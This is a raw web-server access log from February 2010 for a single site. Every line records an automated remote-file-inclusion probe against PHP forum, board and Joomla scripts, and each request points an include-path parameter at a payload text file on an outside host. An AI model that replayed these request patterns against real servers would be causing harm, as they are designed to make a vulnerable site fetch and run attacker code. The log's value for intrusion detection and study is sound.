219.150.205.156 - - [20/Feb/2010:06:30:31 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:31:35 -0800] "GET /logs/access_100207.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:32:50 -0800] "GET /3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:32:50 -0800] "GET /logs/access_100115.log%20%20//3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:32:50 -0800] "GET /logs//3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:32:57 -0800] "GET /ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:32:57 -0800] "GET /logs/access_100126.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:32:57 -0800] "GET /logs/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:32:57 -0800] "GET /logs/access_100205.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:33:12 -0800] "GET /logs/access_100119.log%20%20//3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:33:19 -0800] "GET /3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:33:19 -0800] "GET /logs//3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:33:19 -0800] "GET /logs/access_100115.log%20%20//3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:06:33:43 -0800] "GET /logs/access_100119.log%20%20//3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:33:45 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:33:45 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:33:45 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:34:01 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:34:04 -0800] "GET /logs/access_100124.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:34:04 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:34:04 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:34:18 -0800] "GET /logs/access_100129.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:34:20 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.155 - - [20/Feb/2010:06:34:27 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:35:16 -0800] "GET /logs/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:35:16 -0800] "GET /ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:35:16 -0800] "GET /logs/access_100205.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:35:16 -0800] "GET /logs/access_100126.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:13 -0800] "GET /arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:13 -0800] "GET /logs/access_100210.log%20%20/arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:13 -0800] "GET /logs/arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:36:14 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:36:14 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:36:14 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:14 -0800] "GET /logs/access_100202.log%20%20/arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:06:36:20 -0800] "GET /logs/access_100127.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:06:36:20 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:06:36:21 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:55 -0800] "GET /arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:55 -0800] "GET /logs/arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:55 -0800] "GET /logs/access_100210.log%20%20/arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:06:36:57 -0800] "GET /logs/access_100202.log%20%20/arcade.php?phpbb_root_path=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:37:03 -0800] "GET /logs/access_100129.log/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.187.91.50 - - [20/Feb/2010:06:37:03 -0800] "GET /logs/access_100127.log/errors.php?error=http://218.208.21.7/albums/album102/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:37:53 -0800] "GET /logs/access_100117.log%20%20//admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:37:53 -0800] "GET /admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:37:53 -0800] "GET /logs//admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:37:53 -0800] "GET /admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:37:53 -0800] "GET /logs/access_100117.log%20%20//admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:37:54 -0800] "GET /logs//admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:38:03 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:38:03 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:38:03 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:14 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:14 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:14 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:38:25 -0800] "GET /logs/access_100124.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:38:25 -0800] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:26 -0800] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:38:28 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:54 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:54 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:38:54 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [20/Feb/2010:06:39:04 -0800] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:39:35 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:39:35 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:39:35 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:39:37 -0800] "GET /include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:39:37 -0800] "GET /logs/access_100125.log%20%20//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:39:37 -0800] "GET /logs/access_100121.log%20%20//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:06:39:37 -0800] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:06:39:49 -0800] "GET /logs/access_100119.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:06:39:57 -0800] "GET /logs/help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:06:39:57 -0800] "GET /help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:06:39:57 -0800] "GET /logs/access_100204.log%20%20/help.php?css_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [20/Feb/2010:06:40:14 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [20/Feb/2010:06:40:15 -0800] "GET /logs/access_100123.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [20/Feb/2010:06:40:15 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:40:20 -0800] "GET /mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:40:20 -0800] "GET /logs/access_100127.log%20%20//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:40:20 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:40:22 -0800] "GET /logs/access_100204.log%20%20//admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:40:25 -0800] "GET /logs/access_100204.log%20%20//admin.php?include_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:40:33 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:40:33 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:40:33 -0800] "GET /logs/access_100208.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:41:19 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:41:19 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:41:19 -0800] "GET /logs/access_100208.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:41:30 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:41:30 -0800] "GET /logs/access_100129.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [20/Feb/2010:06:41:30 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:41:49 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:41:49 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [20/Feb/2010:06:41:49 -0800] "GET /logs/access_100208.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:22 -0800] "GET /logs/access_100207.log%20%20/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:22 -0800] "GET /logs/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:22 -0800] "GET /modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:22 -0800] "GET /logs/access_100207.log%20%20/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:22 -0800] "GET /logs/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:22 -0800] "GET /modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:42:45 -0800] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
219.150.205.156 - - [20/Feb/2010:06:42:47 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:48 -0800] "GET /logs/access_100204.log%20%20/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [20/Feb/2010:06:42:51 -0800] "GET /logs/access_100204.log%20%20/modify.php?dir_module=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:43:18 -0800] "GET /logs/access_100127.log/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:43:55 -0800] "GET /logs/access_100111.log/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:43:55 -0800] "GET /logs/index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:06:43:56 -0800] "GET /index.php?ptconf[src]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:45:20 -0800] "GET /logs/access_100205.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:45:20 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:06:45:20 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
